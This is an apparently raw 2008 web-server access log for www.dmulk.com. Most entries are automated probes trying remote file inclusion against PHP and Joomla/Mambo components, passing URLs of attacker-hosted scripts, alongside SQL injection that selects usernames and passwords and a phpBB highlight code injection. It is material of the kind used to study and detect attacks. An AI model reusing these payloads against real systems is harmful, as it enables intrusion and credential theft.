72.55.153.109 - - [11/Jun/2008:10:35:20 -0700] "GET /logs/access_080331.log/trans.php?trans=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:35:26 -0700] "GET /logs/index.php?command=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:35:27 -0700] "GET /index.php?command=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 200 18425 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:35:52 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.171.40 - - [11/Jun/2008:10:35:55 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:10:36:06 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:36:09 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:10:36:17 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.242.160 - - [11/Jun/2008:10:36:48 -0700] "GET /logs/access_080302.log/index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.242.160 - - [11/Jun/2008:10:36:48 -0700] "GET /logs/index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.242.160 - - [11/Jun/2008:10:36:50 -0700] "GET /index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* HTTP/1.1" 200 18691 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.242.160 - - [11/Jun/2008:10:37:05 -0700] "GET /logs/access_080306.log/index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.58.78.39 - - [11/Jun/2008:10:37:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.39 - - [11/Jun/2008:10:37:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:10:37:32 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:10:37:35 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:10:37:37 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:10:38:20 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:10:38:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:10:38:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:10:39:00 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.64.234 - - [11/Jun/2008:10:39:48 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:40:09 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:40:10 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:40:10 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:10:40:11 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.36.241.244 - - [11/Jun/2008:10:40:54 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://stampthai.rmemo.org/ec.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:00 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:01 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:01 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.64.234 - - [11/Jun/2008:10:41:15 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:31 -0700] "GET /logs/access.log/components/com_joomlaboard/file_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:31 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:41:32 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:42:02 -0700] "GET /index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:42:02 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:42:08 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:42:08 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:42:30 -0700] "GET /logs/access_080216.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:42:31 -0700] "GET //index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 200 18553 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:42:32 -0700] "GET /logs//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:10:43:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [11/Jun/2008:10:43:52 -0700] "GET /logs/access.log/index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://stampthai.rmemo.org/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [11/Jun/2008:10:43:52 -0700] "GET /logs/index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://stampthai.rmemo.org/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:10:44:00 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:10:44:11 -0700] "GET /logs/access_080429.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://alb1.freehostia.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:44:42 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:44:47 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:45:10 -0700] "GET /index.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 200 18417 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:45:11 -0700] "GET /logs/index.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:45:13 -0700] "GET /logs/index.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:45:13 -0700] "GET /index.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 200 18403 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:45:45 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:45:46 -0700] "GET //modules/xfsection/modify.php?dir_module=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:45:46 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:46:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:46:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:46:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:46:19 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:46:22 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.22.189 - - [11/Jun/2008:10:46:30 -0700] "GET /?D=A HTTP/1.0" 200 18257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.36.241.244 - - [11/Jun/2008:10:46:55 -0700] "GET /logs/access_080215.log/index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://stampthai.rmemo.org/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.39 - - [11/Jun/2008:10:46:56 -0700] "GET /bikes/dteel/EQ2/?M=A HTTP/1.1" 200 841 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:10:46:59 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:10:46:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:10:46:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:47:24 -0700] "GET /logs/access_080120.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:10:47:31 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:10:47:38 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:10:48:02 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:10:48:02 -0700] "GET //errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:10:48:02 -0700] "GET /logs//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:48:04 -0700] "GET /logs//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.195.37.180 - - [11/Jun/2008:10:48:06 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 1893701 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.192.70.11 - - [11/Jun/2008:10:48:06 -0700] "GET //index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 200 18553 "-" "libwww-perl/5.64" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:10:50:17 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:10:50:17 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.188.110.128 - - [11/Jun/2008:10:51:12 -0700] "GET /errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.255.251.85 - - [11/Jun/2008:10:51:25 -0700] "GET /logs/access_080106.log/components/com_joomlaboard/image_upload.php?sbp=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:10:51:31 -0700] "GET /logs/access_080429.log//embed/day.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:10:51:36 -0700] "GET //embed/day.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:10:51:40 -0700] "GET /logs//embed/day.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:10:51:43 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:51:59 -0700] "GET //errors.php?error=http://www.geocities.com/mirza.putri/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:51:59 -0700] "GET /logs//errors.php?error=http://www.geocities.com/mirza.putri/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:10:52:45 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:52:56 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:52:56 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.69.204.75 - - [11/Jun/2008:10:52:56 -0700] "GET /logs/index.php?option=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.69.204.75 - - [11/Jun/2008:10:53:00 -0700] "GET /index.php?option=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 200 18425 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:53:35 -0700] "GET /logs/index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:53:36 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:53:36 -0700] "GET /index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:53:36 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:10:54:35 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:54:46 -0700] "GET /logs/index2.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:54:48 -0700] "GET /index2.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:54:49 -0700] "GET /logs/index2.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:10:54:55 -0700] "GET /index2.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.214.56.123 - - [11/Jun/2008:10:54:59 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.214.56.123 - - [11/Jun/2008:10:55:01 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 200 18515 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:10:55:15 -0700] "GET /logs/sub.php?menu=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:10:55:21 -0700] "GET /sub.php?menu=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:55:58 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:55:58 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:55:58 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:56:13 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
